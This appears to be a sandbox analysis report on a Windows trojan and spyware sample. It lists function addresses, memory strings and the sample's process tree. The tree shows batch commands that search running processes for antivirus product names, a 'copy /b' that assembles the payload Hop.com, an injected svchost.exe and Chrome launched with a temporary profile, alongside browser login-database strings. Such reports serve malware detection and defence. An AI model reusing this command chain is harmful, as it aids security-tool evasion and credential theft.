                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AFCB5C15_3_00007DF426AFCB5C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7EB0C15_3_00007DF426B7EB0C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B8AAB415_3_00007DF426B8AAB4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AA7AE015_3_00007DF426AA7AE0
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AF0AD415_3_00007DF426AF0AD4
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B0582415_3_00007DF426B05824
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426B7E77415_3_00007DF426B7E774
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AAE97015_3_00007DF426AAE970
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AE395C15_3_00007DF426AE395C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C2764069D815_2_000001C2764069D8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C2764051BC15_2_000001C2764051BC
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276407FE815_2_000001C276407FE8
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276402F0015_2_000001C276402F00
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276409E9815_2_000001C276409E98
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27640442C15_2_000001C27640442C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27640B43C15_2_000001C27640B43C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27640E4EA15_2_000001C27640E4EA
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27640150015_2_000001C276401500
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C276409B4C15_2_000001C276409B4C
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C2764147C915_2_000001C2764147C9
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27641484A15_2_000001C27641484A
                      Source: C:\Windows\System32\svchost.exeCode function: 15_2_000001C27641953615_2_000001C276419536
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_3_00007DF4F81A392C35_3_00007DF4F81A392C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_3_00007DF4F81A4EFC35_3_00007DF4F81A4EFC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_3_00007DF4F81A220435_3_00007DF4F81A2204
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FDC2D035_2_0000021AB2FDC2D0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE321835_2_0000021AB2FE3218
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FD262C35_2_0000021AB2FD262C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300420C35_2_0000021AB300420C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB301422135_2_0000021AB3014221
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300522435_2_0000021AB3005224
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB3010A4435_2_0000021AB3010A44
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB30060EC35_2_0000021AB30060EC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FEEABC35_2_0000021AB2FEEABC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB301011435_2_0000021AB3010114
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300F15835_2_0000021AB300F158
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE723435_2_0000021AB2FE7234
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300F9A435_2_0000021AB300F9A4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE5FCC35_2_0000021AB2FE5FCC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300AFF035_2_0000021AB300AFF0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FFE02835_2_0000021AB2FFE028
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB301104835_2_0000021AB3011048
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FED73035_2_0000021AB2FED730
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB30050A435_2_0000021AB30050A4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF089835_2_0000021AB2FF0898
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300474435_2_0000021AB3004744
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF786835_2_0000021AB2FF7868
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FEC5D835_2_0000021AB2FEC5D8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FE758035_2_0000021AB2FE7580
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FEFD3C35_2_0000021AB2FEFD3C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300669C35_2_0000021AB300669C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF74EC35_2_0000021AB2FF74EC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF8E8835_2_0000021AB2FF8E88
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF467835_2_0000021AB2FF4678
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FECE7035_2_0000021AB2FECE70
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FF7E5835_2_0000021AB2FF7E58
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB301156435_2_0000021AB3011564
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB3005D8435_2_0000021AB3005D84
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB3009DA835_2_0000021AB3009DA8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB30055BC35_2_0000021AB30055BC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB3016C0835_2_0000021AB3016C08
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB3000C4C35_2_0000021AB3000C4C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300F4B835_2_0000021AB300F4B8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FD14D035_2_0000021AB2FD14D0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FEE40435_2_0000021AB2FEE404
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB300D3C835_2_0000021AB300D3C8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81A22CC35_2_00007DF4F81A22CC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81B8FDC35_2_00007DF4F81B8FDC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81B9C1835_2_00007DF4F81B9C18
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81B720035_2_00007DF4F81B7200
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81B848035_2_00007DF4F81B8480
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E539635_2_00007DF4F81E5396
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E6BE735_2_00007DF4F81E6BE7
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E5BB835_2_00007DF4F81E5BB8
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81D4FC635_2_00007DF4F81D4FC6
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E781435_2_00007DF4F81E7814
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E3FFB35_2_00007DF4F81E3FFB
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81DF40935_2_00007DF4F81DF409
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81DC00935_2_00007DF4F81DC009
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81DA86535_2_00007DF4F81DA865
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81DC88435_2_00007DF4F81DC884
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E248735_2_00007DF4F81E2487
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E54E735_2_00007DF4F81E54E7
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E74BE35_2_00007DF4F81E74BE
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E7D1835_2_00007DF4F81E7D18
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E5D7235_2_00007DF4F81E5D72
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E31E435_2_00007DF4F81E31E4
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E6E1B35_2_00007DF4F81E6E1B
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E121A35_2_00007DF4F81E121A
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E720A35_2_00007DF4F81E720A
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81DE2AB35_2_00007DF4F81DE2AB
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81D867A35_2_00007DF4F81D867A
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81D8ED935_2_00007DF4F81D8ED9
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E571635_2_00007DF4F81E5716
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81D576C35_2_00007DF4F81D576C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F81E636535_2_00007DF4F81E6365
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F82127AC35_2_00007DF4F82127AC
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F820F04835_2_00007DF4F820F048
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F8219C7435_2_00007DF4F8219C74
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F820F8E035_2_00007DF4F820F8E0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F821152C35_2_00007DF4F821152C
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F82101A035_2_00007DF4F82101A0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F821728D35_2_00007DF4F821728D
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F8210E7435_2_00007DF4F8210E74
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_00007DF4F821330835_2_00007DF4F8213308
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C7BD4036_2_000001F269C7BD40
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C854A036_2_000001F269C854A0
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C7745436_2_000001F269C77454
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C93C6036_2_000001F269C93C60
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C92BC036_2_000001F269C92BC0
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C893B436_2_000001F269C893B4
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9478036_2_000001F269C94780
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9C78836_2_000001F269C9C788
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C88F9836_2_000001F269C88F98
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269CA1F2836_2_000001F269CA1F28
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C78ECC36_2_000001F269C78ECC
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C7D6DC36_2_000001F269C7D6DC
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C926D436_2_000001F269C926D4
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8AEF036_2_000001F269C8AEF0
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C7C6AC36_2_000001F269C7C6AC
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8E5FC36_2_000001F269C8E5FC
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C89E1036_2_000001F269C89E10
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9C62036_2_000001F269C9C620
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8A5D836_2_000001F269C8A5D8
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8A94036_2_000001F269C8A940
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C898F836_2_000001F269C898F8
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C7C0BC36_2_000001F269C7C0BC
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8287C36_2_000001F269C8287C
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C8F84C36_2_000001F269C8F84C
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9237436_2_000001F269C92374
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9333036_2_000001F269C93330
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C89A7836_2_000001F269C89A78
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C88A6036_2_000001F269C88A60
                      Source: C:\Windows\System32\dllhost.exeCode function: 36_2_000001F269C9426436_2_000001F269C94264
                      Source: Joe Sandbox View, Dropped File: C:\Users\user\AppData\Local\Temp\407310\Hop.com 69D2F1718EA284829DDF8C1A0B39742AE59F2F21F152A664BAA01940EF43E353
                      Source: C:\Windows\System32\svchost.exe, Code function: String function: 000001C27832FDB0 appears 159 times
                      Source: C:\Windows\System32\svchost.exe, Code function: String function: 000001C2783AD0A8 appears 39 times
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exe, Code function: String function: 004062CF appears 58 times
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.com, Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4120 -s 340
                      Source: HI6VIJERUn.exe, Static PE information: invalid certificate
                      Source: HI6VIJERUn.exe, 00000000.00000002.1451254872.0000000000782000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCmd.Exej% vs HI6VIJERUn.exe
                      Source: HI6VIJERUn.exe, 00000000.00000003.1449815166.0000000000782000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameCmd.Exej% vs HI6VIJERUn.exe
                      Source: HI6VIJERUn.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Hop.com, 0000000E.00000003.1670942879.0000024366333000.00000040.00000400.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1667549028.0000024366333000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: FaI O k.h.o.vBP.tV.R.u_t_X_Pt G-~ qoUy_Wc_k_P v
                      Source: Hop.com, 0000000E.00000003.1670942879.0000024366333000.00000040.00000400.00020000.00000000.sdmp, Hop.com, 0000000E.00000003.1667549028.0000024366333000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: u.C.Ji.rDd_qU q q.q p d.L$_vX v_k: i_fMly.JPf.3 X_tFT.O_k_a_C H f<) F.yc: E_r_P.h P R_qY K.R.y w,v S q O L F j}.ZJ.b_J zF p.L7 KLJ.R_g_a.Q@.a_N.QAD NC nB k a< s_t w c_sQ_e z.i.Q.v.2.7.n[.t_rX.9_lqY/}V W a:F_l nYo R.k x_B Q W.M.b.S_wkM.9.7.s4 K{F_j_L- f_l0 J.SL5Y$_Q.U.s.RL f w.Q.HT.W.Tta0 t TTgz G sk f.9.Fh.K cIlA_Mx.e G.P_y_r_t.c t.a.6_u.FaI O k.h.o.vBP.tV.R.u_t_X_Pt G-~ qoUy_Wc_k_P v.1_q_w_J_xmbg<_r_p.Z`n.x
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@96/257@15/13
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4B4124 GetLastError,FormatMessageW,12_2_00007FF68C4B4124
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4AC46C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,12_2_00007FF68C4AC46C
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comCode function: 12_2_00007FF68C4B368C CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,12_2_00007FF68C4B368C
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics\BrowserMetrics-6762D450-1DEC.pma
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_03
                      Source: C:\Windows\System32\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-848131cc-aa66-92c02f-cf44db55973b}
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile created: C:\Users\user\AppData\Local\Temp\nsh6CC5.tmp
                      Source: HI6VIJERUn.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\svchost.exeSystem information queried: HandleInformation
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile read: C:\Users\desktop.ini
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                      Source: chrome.exe, 00000013.00000002.1871413271.0000023A3EA60000.00000002.00000001.00040000.00000014.sdmpBinary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: svchost.exe, 0000000F.00000003.1909913731.000001C278665000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1861406446.000001C278639000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1910669488.000001C2786CA000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1871444142.0000023A3EA75000.00000002.00000001.00040000.00000015.sdmp, chrome.exe, 00000013.00000002.1878280103.0000422C006C8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: svchost.exe, 0000000F.00000003.1935708010.000001C279550000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230303162.000001C2796A0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1778413145.000001C2791D0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2230641697.00007DF426B93000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1779238320.000001C2791D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: HI6VIJERUn.exeReversingLabs: Detection: 55%
                      Source: svchost.exeString found in binary or memory: The device has succeeded a query-stop and its resource requirements have changed.
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeFile read: C:\Users\user\Desktop\HI6VIJERUn.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\HI6VIJERUn.exe "C:\Users\user\Desktop\HI6VIJERUn.exe"
                      Source: C:\Users\user\Desktop\HI6VIJERUn.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 407310
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Tall + ..\Compensation + ..\Limited + ..\Pasta + ..\Patricia + ..\Mac + ..\Terminal + ..\Roommate + ..\Pts + ..\Andorra B
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com Hop.com B
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com C:\Users\user\AppData\Local\Temp\407310\Hop.com
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Users\user\AppData\Local\Temp\407310\Hop.com C:\Users\user\AppData\Local\Temp\407310\Hop.com
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\407310\Hop.comProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4120 -s 340
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr992.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/14c90ac5"
